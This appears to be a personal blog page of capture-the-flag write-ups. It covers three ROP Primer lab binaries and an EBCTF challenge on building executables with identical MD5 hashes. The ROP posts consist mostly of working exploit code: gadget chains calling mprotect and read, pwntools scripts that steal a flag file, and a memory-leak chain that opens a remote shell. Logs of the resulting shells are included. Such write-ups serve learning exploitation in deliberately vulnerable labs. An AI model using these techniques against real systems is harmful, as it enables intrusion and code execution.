Thursday, August 6, 2015

ROP Primer v0.2 level 2

Last level in the series, and according to the developer this is the hardest one, since we cannot use nul bytes. Meh.
Again we have the source code:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv, char **argp)
{
  if (argc > 1)
  {
      char name[32];
      printf("[+] ROP tutorial level2\n");
      strcpy(name, argv[1]);
      printf("[+] Bet you can't ROP me this time around, %s!\n", name);
  }
  return 0;
}

So, our ROP chain needs to be in the first argument to the program. Another thing, this binary is statically linked and contains almost everything that the first binary did:

$ file level2 
level2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=baba7f4fd049424caed048eb73eb6668b45a962e, not stripped
$ readelf -s level2 | wc -l
2059

So this should be pretty easy. Why?
Because we can probably more or less just copy the ROP chain we built for level0. The gadgets will be in new locations but most, if not all, should still be there. These are the gadgets we used in level0:

0x080495f7 : jmp eax
0x0804f9f1 : dec ebx; ret
0x080525c6 : pop edx; ret
0x080525ed : pop ecx; pop ebx; ret
0x08052cf0 : int 0x80; ret
0x08068c63 : inc edx; or al, 0x5d; ret
0x0806a60f : inc eax; ret
0x0806b53e : add eax, ecx; ret
0x0806b893 : pop eax; ret
0x0806bf9c : dec eax; ret
0x08082fd0 : inc ebx; or al, 0xeb; ret
0x08097bff : xor eax, eax; ret
0x08097eda : add ecx, ecx; ret
0x080c8933 : inc ecx; ret

I looked into level2 and this is what I found:

0x08049477 : jmp eax
0x0804f871 : dec ebx; ret
0x08052476 : pop edx; ret
0x0805249d : pop ecx; pop ebx; ret
0x08052ba0 : int 0x80; ret
0x08068973 : inc edx; or al, 0x5d; ret
0x0806a2ef : inc eax; ret
0x0806b21e : add eax, ecx; ret
0x080a81d6 : pop eax; ret
0x080a80c6 : dec eax; ret
0x08082cb0 : inc ebx; or al, 0xeb; ret
0x08097a7f : xor eax, eax; ret
0x08097d5a : add ecx, ecx; ret
0x080c86db : inc ecx; ret

Exactly the same!

So, what to do?

My plan will be to use the same ROP chain as in level0. When it has run it will read shellcode from standard in and hopefully spawn a shell. The ROP chain will be delivered through the first argument.

Lets build the exploit, and remember to turn on ASLR on the VM.

First, how many bytes should we write before controlling eip?

$ gdb -q ./level2
Reading symbols from ./level2...(no debugging symbols found)...done.
(gdb) r $(cyclic 100)
Starting program: /home/robert/code/OnlineWargames/VulnHub/rop-primer-v0.2/level2/level2 $(cyclic 100)
[+] ROP tutorial level2
[+] Bet you can't ROP me this time around, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa!

Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 5800] will be killed.

Quit anyway? (y or n) y
$ cyclic -l 0x6161616c
44
$ 

44. How nice. Here is our exploit:

#!/usr/bin/env python2

import struct, sys, time

ret_offset = 44
writable = 0x08048000

def rop_chain():
    gadgets = [
        #mprotect(writable, 1024, PROT_READ|PROT_WRITE|PROT_EXEC)
        #Set edx = 7 = PROT_READ|PROT_WRITE|PROT_EXEC
         0x08052476 # pop edx; ret               edx = -1
        ,0xffffffff  # -> edx
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 0
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 1
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 2
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 3
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 4
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 5
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 6
        ,0x08068973 # inc edx; or al, 0x5d; ret  edx = 7

        #Set eax=125=SYS_mprotect
        #Set ecx=1024=size
        #Set ebx=writable
        ,0x0805249d # pop ecx; pop ebx; ret   ecx=-1, ebx=writable
        ,0xffffffff  # -> ecx             ecx = -1
        ,writable + 1# -> ebx             ebx = writable + 1
        ,0x0804f871 # dec ebx; ret       ebx = writable

        ,0x080c86db # inc ecx; ret       ecx = 0
        ,0x080c86db # inc ecx; ret       ecx = 1
        ,0x080c86db # inc ecx; ret       ecx = 2
        ,0x08097d5a # add ecx, ecx; ret  ecx = 4
        ,0x08097d5a # add ecx, ecx; ret  ecx = 8
        ,0x08097d5a # add ecx, ecx; ret  ecx = 16
        ,0x08097d5a # add ecx, ecx; ret  ecx = 32
        ,0x08097d5a # add ecx, ecx; ret  ecx = 64
        ,0x08097d5a # add ecx, ecx; ret  ecx = 128

        ,0x08097a7f # xor eax, eax; ret  eax = 0
        ,0x0806b21e # add eax, ecx; ret  eax = 128
        ,0x080a80c6 # dec eax; ret       eax = 127
        ,0x080a80c6 # dec eax; ret       eax = 126
        ,0x080a80c6 # dec eax; ret       eax = 125 = SYS_mprotect

        ,0x08097d5a # add ecx, ecx; ret  ecx = 256
        ,0x08097d5a # add ecx, ecx; ret  ecx = 512
        ,0x08097d5a # add ecx, ecx; ret  ecx = 1024

        #Now we're ready for mprotect
        ,0x08052ba0 # int 0x80; ret    Issue syscall

        #read(0, writable, 0x01010101)
        #eax = 3 = SYS_read, ebx = 0, ecx = writable, edx = 0x01010101

        #Set ecx = writable
        ,0x0805249d # pop ecx; pop ebx; ret          ecx = writable + 1, ebx = -1
        ,writable + 1#-> ecx
        ,0xffffffff  #-> ebx

        #Set ebx = 0, now it is -1
        ,0x08082cb0 # inc ebx; or al, 0xeb; ret      ebx = 0
        
        #Set eax = 3
        ,0x08097a7f # xor eax, eax; ret
        ,0x0806a2ef # inc eax; ret  #eax = 1
        ,0x0806a2ef # inc eax; ret  #eax = 2
        ,0x0806a2ef # inc eax; ret  #eax = 3

        #Set edx = 0x01010101
        ,0x08052476 # pop edx; ret
        ,0x01010101  #-> edx

        #And we're ready for read
        ,0x08052ba0 # int 0x80; ret    Issue syscall

        #Now jump to writable
        ,0x080a81d6 # pop eax; ret
        ,writable + 1# -> eax
        ,0x08049477 # jmp eax  GOTO shellcode!
    ]
    return ''.join(struct.pack('<I', _) for _ in gadgets)

print 'A' * ret_offset + rop_chain()

It's more or less exactly the same as in level2 except it does not contain a shellcode, that should be piped in through standard in. pwntools has a tool called shellcraft which can be used for generating shellcode. I'll generate a shell spawning shellcode, write it to a file and upload it to the VM together with the exploit.


$ shellcraft -f r i386.linux.sh > shellcode
$ scp -P 2222 shellcode level2@localhost:
level2@localhost's password: 
shellcode                    100%   22     0.0KB/s   00:00    
$ scp -P 2222 exploit.py level2@localhost:
level2@localhost's password: 
exploit.py                   100% 3082     3.0KB/s   00:00    
$ ssh -p 2222 level2@localhost
level2@localhost's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/
Last login: Wed Jan 21 01:00:23 2015 from 192.168.56.1
level2@rop:~$ ( cat shellcode && cat ) | ./level2 "$(./exploit.py)"
[+] ROP tutorial level2
[+] Bet you can't ROP me this time around, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv����s�s�s�s�s�s�s�s�������q�ۆ
                                                                                                                     ۆ
                                                                                                                     ۆ
                                                                                                                     Z}Z}      Z}      Z}      Z}      Z}     z�ƀ
ƀ
ƀ
Z}     Z}      Z}      ������z������v�ց
�w�!
whoami
root
cat flag
flag{to_rop_or_not_to_rop}
Easy money.

Wednesday, August 5, 2015

ROP Primer v0.2 level 1

So, I've pwned level0 the hard way, lets continue on that path and take on level1.

Let's have a quick view:

$ file level1
level1: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=8a2b93e2b54246aa15e8ff2447035e740fb176cb, not stripped
$ checksec level1
[*] '/media/data/code/OnlineWargames/VulnHub/rop-primer-v0.2/level1/level1'
    Arch:          i386-32-little
    RELRO:         No RELRO
    Stack Canary:  No canary found
    NX:            NX enabled
    PIE:           No PIE
$ readelf -s level1 | grep -E '(system)|(mprotect)|(mmap)|(exec)'
$

So, this one is dynamically linked and lacks our favorite functions for getting code execution. Bummer!
Luckily we have an awesome tool at our disposal: pwntools!

The developer of this challenge has hinted that we should just read a flag file, but I want code execution. pwntools makes both these goals easy so let's do both. Get my stuff here. Also, not bypassing ASLR is for n00bz, so enable ASLR! And install pwntools (sudo pip install pwntools).

First read flag!

No wait, first find vulnerability!

We have the C code for the binary which is pretty easy to read. The vulnerability is in the handle_conn function at line 72:

char filename[32], cmd[32];
...
read(fd, &str_filesize, 6);
filesize = atoi(str_filesize);
...
read_bytes = read(fd, filename, filesize);

We control filesize and that read into filename should probably only have read 31 bytes. Lets see how much we should write before hitting the return address. In terminal 1:

$ gdb -q ./level1
Reading symbols from ./level1...(no debugging symbols found)...done.
(gdb) set follow-fork-mode child
(gdb) r
Starting program: /media/data/code/OnlineWargames/VulnHub/rop-primer-v0.2/level1/level1 
[New process 7150]

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 7150]
0x61616171 in ?? ()
(gdb)

...and terminal 2:

$ cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
$ nc localhost 8888
Welcome to 
 XERXES File Storage System
  available commands are:
  store, read, exit.

> store
 Please, how many bytes is your file?

> 101
 Please, send your file:

> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
   XERXES is pleased to inform you
    that your file was received
        most successfully.
 Please, give a filename:
> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
^C
$ cyclic -l 0x61616171
64
$

So we need to write 64 chars before overwriting the return address. Luckily for us the vulnerability uses read to fetch our data so there are absolutely no bad characters and we can form the stack exactly as we wish.

Also, both open, read, write and the string "flag" (which is the name of the file) can be found in the binary. The functions are all in the PLT and thus callable just as if they were implemented directly in the binary. We'll also need memset, which is also in the PLT.

$ readelf -s level1 | grep -E '(read)|(write)|(open)|(memset)'
     2: 00000000     0 FUNC    GLOBAL DEFAULT  UND read@GLIBC_2.0 (2)
    11: 00000000     0 FUNC    GLOBAL DEFAULT  UND open@GLIBC_2.0 (2)
    14: 00000000     0 FUNC    GLOBAL DEFAULT  UND write@GLIBC_2.0 (2)
    16: 00000000     0 FUNC    GLOBAL DEFAULT  UND memset@GLIBC_2.0 (2)
    48: 00000000     0 FUNC    GLOBAL DEFAULT  UND read@@GLIBC_2.0
    56: 080488cb    74 FUNC    GLOBAL DEFAULT   14 write_file
    65: 00000000     0 FUNC    GLOBAL DEFAULT  UND open@@GLIBC_2.0
    69: 00000000     0 FUNC    GLOBAL DEFAULT  UND write@@GLIBC_2.0
    72: 00000000     0 FUNC    GLOBAL DEFAULT  UND memset@@GLIBC_2.0
    89: 0804889c    47 FUNC    GLOBAL DEFAULT   14 write_buf

Let's try building a flag stealing exploit.

pwntools is a Python framework that can be used for building exploits and it can be installed through 'pip'. We will be using the remote, ELF and ROP classes in our exploit.

remote is a socket connection and can be used to connect and talk to a listening server. ELF knows how to look up addresses in the binary such as PLT entries and the location of the "flag" string. ROP can build ROP chains using PLT entries.

Actually, let's play around with the ROP class before building our exploit. Say we wanted to do this:

//0x0804a000 is known to be mapped and writable
memset(0x0804a000, 0, 129); //Just to remove crap
open("flag", 0); //This will return file descriptor 3
read(3, 0x0804a000, 128);
write(4, 0x0804a000, 128); //Our socket is file descriptor 4

This is how it could be done:

$ python
Python 2.7.9 (default, Apr  2 2015, 15:33:21) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> e = ELF('level1')
[*] '/vagrant/level1'
    Arch:          i386-32-little
    RELRO:         No RELRO
    Stack Canary:  No canary found
    NX:            NX enabled
    PIE:           No PIE
>>> r = ROP(e)
[*] Loaded cached gadgets for 'level1' @ 0x8048000
>>> r.memset(0x0804a000, 0, 129)
>>> r.open(next(e.search('flag')), 0)
>>> r.read(3, 0x0804a000, 128)
>>> r.write(4, 0x0804a000, 128)
>>> print r.dump()
0x0000:        0x8048720 (memset)
0x0004:        0x8048ef6 (pop esi; pop edi; pop ebp; ret)
0x0008:        0x804a000
0x000c:              0x0
0x0010:             0x81
0x0014:        0x80486d0 (open)
0x0018:        0x8048ef7 (pop edi; pop ebp; ret)
0x001c:        0x8049128
0x0020:              0x0
0x0024:        0x8048640 (read)
0x0028:        0x8048ef6 (pop esi; pop edi; pop ebp; ret)
0x002c:              0x3
0x0030:        0x804a000
0x0034:             0x80
0x0038:        0x8048700 (write)
0x003c:       0xdeadbeef
0x0040:              0x4
0x0044:        0x804a000
0x0048:             0x80
>>>

We simply call the functions we want on the ROP object with the arguments we want and it will find the PLT entry and build a ROP stack for us. Between calls we return to gadgets that remove the arguments from the stack so that we can return to the next call on the list. The last return address is 0xdeadbeef so at that point the binary will segfault unless we end up calling exit. I won't thou, you do it!

The exploit is so embarrassingly simple that I'll show it here:


#!/usr/bin/env python2

import sys
from pwn import *

context(arch = 'i386', os = 'linux')

HOST="localhost"
PORT=8888
#A writable mapped address
WRITABLE = 0x0804a000
#The socket is always file descriptor 4
SOCKET_FD = 4
#The opened file is always file descriptor 3
FILE_FD = 3

elf = ELF('level1')
rop = ROP(elf)
#We don't know how large the file is but probably less than 128 bytes
#so null out 129 bytes
rop.memset(WRITABLE, 0, 129)
#Open the 'flag' file. The string 'flag' can be found in the binary
rop.open(next(elf.search('flag')), 0)
#Read 128 bytes from the file
rop.read(FILE_FD, WRITABLE, 128)
#And write the result on the socket
rop.write(SOCKET_FD, WRITABLE, 128)

#64 chars before overwriting return address
payload = 'A' * 64 + rop.chain()

def pwn(host, port):
    r = remote(host, port)
    r.recvuntil('> ')
    r.send('store\n')
    r.recvuntil('> ')
    r.send('%d\n' % (len(payload) + 1))
    r.recvuntil('> ')
    r.send(payload + '\n')
    r.recvuntil('> ')
    r.send(payload)
    print r.recv().rstrip('\x00')

if len(sys.argv) > 1: HOST = sys.argv[1]
if len(sys.argv) > 2: PORT = int(sys.argv[2])
pwn(HOST, PORT)

Dead simple, right?
Let's see if it works:

$ ./flag_exploit.py 
[*] '/home/robert/code/OnlineWargames/VulnHub/rop-primer-v0.2/level1/level1'
    Arch:          i386-32-little
    RELRO:         No RELRO
    Stack Canary:  No canary found
    NX:            NX enabled
    PIE:           No PIE
[*] Loaded cached gadgets for 'level1' @ 0x8048000
[+] Opening connection to localhost on port 8888: Done
flag{just_one_rop_chain_a_day_keeps_the_doctor_away}

[*] Closed connection to localhost port 8888

Yay!

But we're not happy yet, because we only have a flag, not code execution.
There were no usable functions in the binary and it is not big enough to allow us to build a chain to invoke the syscalls directly. What to do?

It turns out we don't need all that much. We can read more or less anything in the process memory space because we can call write with whatever arguments we want, so with a little ingenuity we can walk the structures that the linker uses to resolve symbols.

That is quite complex but fortunately pwntools has done all the work for us. We need DynELF!

DynELF is another class in pwntools. We pass it an ELF object and a function that given an address will read and return the data at that location and our ROP chain above does more or less just that.

That way we can resolve mprotect and then we can mark a memory segment as read/write/executable and place shellcode there. pwntools also contains a very useful shellcode library so the get_a_shell exploit is also quite simple. Have a look:

#!/usr/bin/env python2

import sys
from pwn import *

context(arch = 'i386', os = 'linux')

HOST="localhost"
PORT=8888
#A writable mapped address
WRITABLE = 0x0804a000
#The socket is always file descriptor 4
SOCKET_FD = 4

def rop_it(host, port, rop):
    '''ROP the host and return the socket'''
    payload = 'A' * 64 + rop.chain()
    r = remote(host, port)
    r.recvuntil('> ')
    r.send('store\n')
    r.recvuntil('> ')
    r.send('%d\n' % (len(payload) + 1))
    r.recvuntil('> ')
    r.send('A' * len(payload) + '\n')
    r.recvuntil('> ')
    r.send(payload)
    return r

def read_it(host, port, elf, addr, size):
    '''read and return the specified number of bytes
       from the specified address at the specified host'''
    rop = ROP(elf)
    rop.write(SOCKET_FD, addr, size)
    r = rop_it(host, port, rop)
    data = r.recv()
    r.close()
    return data

def leak_it(host, port, elf):
    '''return a leak function for the specified host and port'''
    def l(addr):
        return read_it(host, port, elf, addr, 4)
    return l

def pwn(host, port):
    #ELF object can find gadgets and useful PLT entries
    elf = ELF('level1')
    #DynELF knows how to resolve functions using an infoleak vuln
    dyn = DynELF(leak_it(host, port, elf), elf = elf)
    #..so let's use it to find 'mprotect' from 'libc'
    mprotect = dyn.lookup('mprotect', 'libc')
    #Have a shellcode that dup2 the socket and spawns a shell
    shellcode = asm(shellcraft.dupsh(SOCKET_FD))
    #Create a ROP object for calling this chain:
    #mprotect(0x0804a000, len(shellcode), PROT_READ | PROT_WRITE | PROT_EXEC)
    #read(4, 0x0804a000, len(shellcode)
    #((void(*)())0x0804a000)()
    rop = ROP(elf)
    rop.call(mprotect, (WRITABLE, len(shellcode), 7))
    rop.read(SOCKET_FD, WRITABLE, len(shellcode))
    rop.call(WRITABLE)
    #Send ROP
    r = rop_it(host, port, rop)
    #ROP requests our shellcode, so send it
    r.send(shellcode)
    #Go interactive
    r.interactive()


if len(sys.argv) > 1: HOST = sys.argv[1]
if len(sys.argv) > 2: PORT = int(sys.argv[2])
pwn(HOST, PORT)

Easy, right? But does it work?
Let's find out:

$ ./shell_exploit.py 
[*] '/home/robert/code/OnlineWargames/VulnHub/rop-primer-v0.2/level1/level1'
    Arch:          i386-32-little
    RELRO:         No RELRO
    Stack Canary:  No canary found
    NX:            NX enabled
    PIE:           No PIE
[*] Loaded cached gadgets for 'level1' @ 0x8048000
[+] Opening connection to localhost on port 8888: Done
[*] Closed connection to localhost port 8888
[+] Loading from '/home/robert/code/OnlineWargames/VulnHub/rop-primer-v0.2/level1/level1': 0xb7fff938
[+] Opening connection to localhost on port 8888: Done
[*] Closed connection to localhost port 8888
[+] Resolving 'mprotect' in 'libc.so': 0xb7fff938
[+] Opening connection to localhost on port 8888: Done
[*] Closed connection to localhost port 8888
[+] Opening connection to localhost on port 8888: Done
[*] Closed connection to localhost port 8888
...
...
[*] Closed connection to localhost port 8888
[+] Opening connection to localhost on port 8888: Done
[*] Switching to interactive mode
$ whoami
level2
$ ls
bleh
flag
level1
$ cat flag
flag{just_one_rop_chain_a_day_keeps_the_doctor_away}
$ 
[*] Interrupted
[*] Closed connection to localhost port 8888

Of course it does!

Each time DynELF looks up a new address we have to open a new connection so we get lots of output but in the end we get an interactive shell.

Tuesday, August 4, 2015

ROP Primer v0.2 level 0

Two years without a post. Nice!

I've been playing with a ROP challenge so I thought I would do a writeup. That's what all the cool kids do these days.

Find it here. And find an archive containing the binary, my exploit and some other stuff here.

This post will be about the 'level0' binary so check it out.

First I do a quick check to find out what I'm looking at:


$ file level0
level0: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=fb91c352b4d0f9680d22497e348340fe88d0fdf8, not stripped
$ checksec level0
[*] '/media/data/VirtualBox VMs/rop-primer-v0.2/level0/level0'
    Arch:          i386-32-little
    RELRO:         No RELRO
    Stack Canary:  No canary found
    NX:            NX enabled
    PIE:           No PIE
$ readelf -s level0 | wc -l
2064
$ readelf -s level0 | grep -E '(system)|(mprotect)'
   482: 080b16e0    62 OBJECT  LOCAL  DEFAULT    7 system_dirs
   483: 080b1720    16 OBJECT  LOCAL  DEFAULT    7 system_dirs_len
  1076: 080523e0    33 FUNC    GLOBAL DEFAULT    4 __mprotect
  1981: 080523e0    33 FUNC    WEAK   DEFAULT    4 mprotect

So, the binary is statically linked and as it turns out contains a whole lot of stuff that we can simply return to. But that's easy and thus boring, so we'll build a real ROP chain and use actual syscalls. And bypass ASLR, and not have nul bytes why not?

I started by uploading the binary to ropshell.com which in turn gave me a nice list of gadgets. Well, not entirely nice. The list contained offsets rather than addresses. The binary is not position independent, so I would really prefer addresses, so I hacked up this small utility to convert the list:


#!/usr/bin/env python2

import re, fileinput

regex = re.compile('^0x([0-9a-f]{8})( : .*)$')

for line in fileinput.input():
    line = line.rstrip()
    m = regex.match(line)
    if m:
        addr = int(m.group(1), 16) + 0x08048000
        print '0x%08x%s' % (addr, m.group(2))
    else:
        print line

The resulting list is in the archive. The following is a list of all the gadgets I ended up needing:

0x080488d9 : dec ecx; ret
0x080495f7 : jmp eax
0x0804f9f1 : dec ebx; ret
0x080525c6 : pop edx; ret
0x080525ed : pop ecx; pop ebx; ret
0x08052cf0 : int 0x80; ret
0x08068c63 : inc edx; or al, 0x5d; ret
0x0806a60f : inc eax; ret
0x0806b53e : add eax, ecx; ret
0x0806b893 : pop eax; ret
0x0806bf9c : dec eax; ret
0x08082fd0 : inc ebx; or al, 0xeb; ret
0x08097bff : xor eax, eax; ret
0x08097eda : add ecx, ecx; ret
0x080c8933 : inc ecx; ret

As is pretty usual some of these gadgets mess up each other while others accomplish multiple tasks, so nothing new here.

My plan is to execute something similar to this:

mprotect(0x0804a000, 1024, PROT_READ | PROT_WRITE | PROT_EXEC);
read(0, 0x0804a000, 0x01010101);
((void(*)())0x0804a000)();

The 0x0804a000 address is known to be mapped, as this is where the main binary is mapped.

Syscall number goes in eax and arguments go in ebx, ecx and edx respectively.

First we'll execute the mprotect syscall so we put PROT_READ | PROT_WRITE | PROT_EXEC into edx.

0x080525c6  # pop edx; ret               edx = -1
0xffffffff  # -> edx
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 0
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 1
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 2
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 3
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 4
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 5
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 6
0x08068c63  # inc edx; or al, 0x5d; ret  edx = 7

Easy!

Next we'll put 125 (SYS_mprotect) into eax, 1024 into ecx and the writable address 0x0804a000 into edx.

0x080525ed  # pop ecx; pop ebx; ret   ecx=-1, ebx=writable
0xffffffff  # -> ecx             ecx = -1
0x0804a001  # -> ebx             ebx = writable + 1
0x0804f9f1  # dec ebx; ret       ebx = writable

0x080c8933  # inc ecx; ret       ecx = 0
0x080c8933  # inc ecx; ret       ecx = 1
0x080c8933  # inc ecx; ret       ecx = 2
0x08097eda  # add ecx, ecx; ret  ecx = 4
0x08097eda  # add ecx, ecx; ret  ecx = 8
0x08097eda  # add ecx, ecx; ret  ecx = 16
0x08097eda  # add ecx, ecx; ret  ecx = 32
0x08097eda  # add ecx, ecx; ret  ecx = 64
0x08097eda  # add ecx, ecx; ret  ecx = 128

0x08097bff  # xor eax, eax; ret  eax = 0
0x0806b53e  # add eax, ecx; ret  eax = 128
0x0806bf9c  # dec eax; ret       eax = 127
0x0806bf9c  # dec eax; ret       eax = 126
0x0806bf9c  # dec eax; ret       eax = 125 = SYS_mprotect

0x08097eda  # add ecx, ecx; ret  ecx = 256
0x08097eda  # add ecx, ecx; ret  ecx = 512
0x08097eda  # add ecx, ecx; ret  ecx = 1024

#Now we're ready for mprotect
0x08052cf0  # int 0x80; ret    Issue syscall

Also pretty easy. The first block initialized ebx to the writable address which must be on a page boundary. Also ecx was initialized to -1.

The next block incremented ecx to contain the value 128 which in the next block is copied to eax which is then decremented to 125 which is the syscall number of mprotect.

Then I continue incrementing ecx to contain the number 1024 which will be the size of the executable segment for our shellcode. So our shellcode can be 1024 bytes long which should be enough, but add or remove some of those add ecx, ecx gadgets if you need more or less space.

So now we have writable and executable memory. Let's put some shellcode there and jump to it. We'll do the read call next. First we put the writable address into ecx and initialize ebx to zero (which is standard in file descriptor):

0x080525ed  # pop ecx; pop ebx; ret          ecx = writable + 1, ebx = -1
0x0804a001  #-> ecx
0xffffffff  #-> ebx
0x080488d9  # dec ecx; ret                   ecx = writable
0x08082fd0  # inc ebx; or al, 0xeb; ret      ebx = 0

Next we put syscall number 3 (SYS_read) into eax and a large value (0x01010101) into edx and we're good to go on the read call:

#Set eax = 3
0x08097bff # xor eax, eax; ret
0x0806a60f # inc eax; ret  #eax = 1
0x0806a60f # inc eax; ret  #eax = 2
0x0806a60f # inc eax; ret  #eax = 3

#Set edx = 0x01010101
0x080525c6  # pop edx; ret
0x01010101  #-> edx

#And we're ready for read
0x08052cf0  # int 0x80; ret    Issue syscall

Finally we jump to the code:

0x0806b893  # pop eax; ret   # eax = 0x0804a001
0x0804a001  # -> eax
0x0806bf9c  # dec eax; ret   # eax = 0x0804a000
0x080495f7  # jmp eax  GOTO shellcode!

And we'll see if it works:

level0@rop:~$ (./exploit.py && cat -) | ./level0
[+] ROP tutorial level0
[+] What's your name? [+] Bet you can't ROP me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� �
                                                                                                  ��3�
                                                                                                     3�
                                                                                                      3�
                                                                                                       �~      �~      �~      �~      �~      �~      �{      >��������~      �~      �~   �����c�c�c�c�c�c�c�c��� �
                      ����و�{  ����    ��� �
                                           ����!
ls
flag  level0  exploit.py
cat flag
flag{rop_the_night_away}

Excellent!
We could shave off some gadgets by only marking 128 bytes executable since our shellcode is 22 bytes long.
Why not mark only 32 then? Because we needed the number 125 in eax and that number came from ecx.

Also, we could read to 0x0804a001 and save two more gadgets for decrementing registers but that would make the code less readable in my opinion, but do try that.

Hope you enjoyed this post.

Monday, August 5, 2013

EBCTF - Binary400 writeup

The challenge was this:
Please upload 5 Windows console executable files with the same MD5 but with different printed outputs (file type: MS Windows, PE32 executable, console)

The output for the files should be:
File1: All Eindbazen are wearing wooden shoes
File2: All Eindbazen live in a windmill
File3: All Eindbazen grow their own tulips
File4: All Eindbazen smoke weed all day
File5: All Eindbazen are cheap bastards
I know of two ways of achieving this but the first one is probably considered cheating:

$ ./file1
All Eindbazen are wearing wooden shoes
$ ./file2
All Eindbazen live in a windmill
$ ./file3
All Eindbazen grow their own tulips
$ ./file4
All Eindbazen smoke weed all day
$ ./file5
All Eindbazen are cheap bastards
$ md5sum file*
291741d9344f70d5b33c52c6e7b041c5  file1
291741d9344f70d5b33c52c6e7b041c5  file2
291741d9344f70d5b33c52c6e7b041c5  file3
291741d9344f70d5b33c52c6e7b041c5  file4
291741d9344f70d5b33c52c6e7b041c5  file5
$ shasum file*
8f69fb6689c44f09422f5c033c97e8978b87c1a2  file1
8f69fb6689c44f09422f5c033c97e8978b87c1a2  file2
8f69fb6689c44f09422f5c033c97e8978b87c1a2  file3
8f69fb6689c44f09422f5c033c97e8978b87c1a2  file4
8f69fb6689c44f09422f5c033c97e8978b87c1a2  file5
Nice huh. But take a look at the code...you'll probably see why this is cheating.

#include <string.h>
#include <stdio.h>
#include <libgen.h>

int main(int argc, char const *argv[]) {
    printf("%s\n",
        strcmp(basename((char*)argv[0]), "file1") == 0 ? "All Eindbazen are wearing wooden shoes" :
        strcmp(basename((char*)argv[0]), "file2") == 0 ? "All Eindbazen live in a windmill" :
        strcmp(basename((char*)argv[0]), "file3") == 0 ? "All Eindbazen grow their own tulips" :
        strcmp(basename((char*)argv[0]), "file4") == 0 ? "All Eindbazen smoke weed all day" :
        strcmp(basename((char*)argv[0]), "file5") == 0 ? "All Eindbazen are cheap bastards" :
                                        "Nope"
    );
    return 0;
}
But fortunately I also have a more correct solution. I am not a cryptologist so the don't expect any details on how to generate md5 collisions, but I will tell you how I got to a solution.

First, MD5 is a state machine. It has an initial state, and for each block of data this state changes. Each time MD5 has a specific state and is given the same block of data, its state will change to the same state.

If two different files have the same MD5 sum you can append the same data to each of then and they will still share the same MD5 sum.

A collision occurs when two different blocks will yield the same state and apparently finding collisions is not that hard. But what can we use that for?

We can make a program something like this:


A1 = "AAAAAAAAAAA"
A2 = "AAAAAAAAAAA"
B1 = "BBBBBBBBBBB"
B2 = "BBBBBBBBBBB"
C1 = "CCCCCCCCCCC"
C2 = "CCCCCCCCCCC"

if (A1 == A2 && B1 == B2 && C1 == C2) {
    print "All Eindbazen are wearing wooden shoes"
} else if (A1 != A2 && B1 == B2 && C1 == C2) {
    print "All Eindbazen live in a windmill"
} else if (A1 == A2 && B1 != B2 && C1 == C2) {
    print "All Eindbazen grow their own tulips"
} else if (A1 != A2 && B1 != B2 && C1 == C2) {
    print "All Eindbazen smoke weed all day"
} else if (A1 == A2 && B1 == B2 && C1 != C2) {
    print "All Eindbazen are cheap bastards"
}
Now, copy this program into five different files and generate three pairs of collisions. In the first program substitute both A1 and A2 with the same block in collision one, B1 and B2 with the same block in collision two, and C1 and C2 with the same block in collision three.
In the second program substitute A1 with the one block of collision one and A2 with the second block of collision one. For B1, B2, C1 and C2 do as in the first program. Now the first and second program will both have the same MD5 sum but exhibit different behaviors. You get the point.
Now, the trick is that the collisions only work for a specific state of the MD5 state machine, so you cannot simply generate three collisions or even use one collision for all three blocks. You have to generate the 'A' collisions first and substitute them in. Then you can generate the 'B' collisions and only then you can generate 'C' collisions.
To do this you can use the Peter Selingers program which can be downloaded from here.
The collisions can be generated faster by using Vlastimil Klimas attack. His code can be gotten from here. It will require some changes however, but you figure it out...that's my challenge to you.
The end result can be seen here:

$ file *
file1.exe: PE32 executable (console) Intel 80386, for MS Windows
file2.exe: PE32 executable (console) Intel 80386, for MS Windows
file3.exe: PE32 executable (console) Intel 80386, for MS Windows
file4.exe: PE32 executable (console) Intel 80386, for MS Windows
file5.exe: PE32 executable (console) Intel 80386, for MS Windows
$ md5sum *
d47eafe3f5ae42e0498ed7769900004c  file1.exe
d47eafe3f5ae42e0498ed7769900004c  file2.exe
d47eafe3f5ae42e0498ed7769900004c  file3.exe
d47eafe3f5ae42e0498ed7769900004c  file4.exe
